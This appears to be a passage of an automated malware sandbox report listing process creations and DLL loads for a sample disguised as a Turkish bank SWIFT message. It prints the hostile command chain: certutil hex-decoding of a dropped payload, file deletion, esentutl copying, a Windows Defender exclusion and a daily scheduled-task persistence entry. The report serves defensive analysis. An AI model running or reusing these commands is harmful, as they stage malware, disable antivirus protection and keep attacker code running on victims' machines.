                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" "
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /o
                      Source: C:\Windows\SysWOW64\esentutl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                      Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:02 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: unknownProcess created: C:\Users\Public\Libraries\Juqmtmya.PIF "C:\Users\Public\Libraries\Juqmtmya.PIF"
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                      Source: unknownProcess created: C:\Users\Public\Libraries\Juqmtmya.PIF "C:\Users\Public\Libraries\Juqmtmya.PIF"
                      Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIFJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S Jump to behavior
                      Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
                      Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 Jump to behavior
                      Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 Jump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" "Jump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /oJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pifJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:02 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: unknown unknown
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: unknown unknown
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: version.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: url.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ???????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
